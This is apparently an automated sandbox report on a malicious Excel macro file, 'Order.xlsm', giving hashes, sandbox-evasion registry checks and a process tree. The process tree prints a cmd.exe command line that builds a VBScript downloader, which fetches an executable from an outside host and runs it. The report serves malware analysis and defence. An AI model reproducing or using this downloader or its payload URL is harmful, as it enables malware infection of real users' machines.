Analysis
- max time kernel: 103s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 03:50
Static task: static1
Behavioral task: behavioral1
  Sample: Order.xlsm
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: Order.xlsm
  Resource: win10v2004-20220414-en
General
- Target: Order.xlsm
- Size: 143KB
- MD5: 5628587a1bc8cc65ef2d1c7283319eaf
- SHA1: 2aea79b0b48861b2edbebe7180d7b5506f951d56
- SHA256: 74f28a4dad71ce2a455d4ad77fe50105b72b2357c2f34cd96b877498b35838cb
- SHA512: 6e7da7bf9514c57d369629d5ba826a77b4caacca0a9ad8c981ecedabab34a63df19d973ec665205b74dd60c1831feacffaf3a28f78faa8af444aae6acc8a3d86
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
    pid: 3420 (cmd.exe)
    pid_target: 1620 (EXCEL.EXE)
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow: 17, pid: 3404, process: cscript.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
    Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid: 1620, process: EXCEL.EXE
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes:
    pid: 1620, process: EXCEL.EXE (14 occurrences)
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    PID 1620 (EXCEL.EXE) wrote to memory of 3420 (cmd.exe)
    PID 1620 (EXCEL.EXE) wrote to memory of 3420 (cmd.exe)
    PID 3420 (cmd.exe) wrote to memory of 3404 (cscript.exe)
    PID 3420 (cmd.exe) wrote to memory of 3404 (cscript.exe)
Processes
- Process 1 (root, pid 1620): C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Process 2 (child of 1, pid 3420): C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd.exe /c @echo strFileURL = "https://manikmeyah.net/wp-content/themes/ft/rUCCfunGgRj9MjR.exe">>C:\ProgramData\poc.vbs&@echo strHDLocation = (WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\"+"Filename.exe")>>C:\ProgramData\poc.vbs&@echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")>>C:\ProgramData\poc.vbs&@echo objXMLHTTP.open "GET", strFileURL, false>>C:\ProgramData\poc.vbs&@echo objXMLHTTP.send()>>C:\ProgramData\poc.vbs&@echo If objXMLHTTP.Status = 200 Then>>C:\ProgramData\poc.vbs&@echo Set objADOStream = CreateObject("ADODB.Stream")>>C:\ProgramData\poc.vbs&@echo objADOStream.Open>>C:\ProgramData\poc.vbs&@echo objADOStream.Type = 1 >>C:\ProgramData\poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>C:\ProgramData\poc.vbs&@echo objADOStream.Position = 0 >>C:\ProgramData\poc.vbs&@echo objADOStream.SaveToFile strHDLocation>>C:\ProgramData\poc.vbs&@echo objADOStream.Close>>C:\ProgramData\poc.vbs&@echo Set objADOStream = Nothing>>C:\ProgramData\poc.vbs&@echo End If>>C:\ProgramData\poc.vbs&@echo Set objXMLHTTP = Nothing>>C:\ProgramData\poc.vbs&@echo Set objShell = CreateObject("WScript.Shell")>>C:\ProgramData\poc.vbs&@echo objShell.Run((WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\"+"Filename.exe"))>>C:\ProgramData\poc.vbs&cscript.exe C:\ProgramData\poc.vbs
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - Process 3 (child of 2, pid 3404): C:\Windows\system32\cscript.exe
      Command line: cscript.exe C:\ProgramData\poc.vbs
      - Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\poc.vbs
  Filesize: 770B
  MD5: 27d0a5ee83c1fe7339c77805c61707c5
  SHA1: a35c12916925f4b32a82aae22c9d6b47dcdc35f7
  SHA256: 0df89e453952e0a34ab493b30c89f3d1e8ed01c779e5f5c23eb925c32c6f29b8
  SHA512: 2bdddf036af567c8669ec9d2b1bee9a852dc6378df71c926188d4b5ae1b7faf04871164f68e87a0838a2e0a468754cc5e098f431847c2c6e50aa4d112e16ddb2
- memory/1620-133-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-132-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-130-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-134-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-135-0x00007FF895D30000-0x00007FF895D40000-memory.dmp (Filesize: 64KB)
- memory/1620-136-0x00007FF895D30000-0x00007FF895D40000-memory.dmp (Filesize: 64KB)
- memory/1620-131-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-141-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-142-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-143-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/1620-144-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp (Filesize: 64KB)
- memory/3404-138-0x0000000000000000-mapping.dmp
- memory/3420-137-0x0000000000000000-mapping.dmp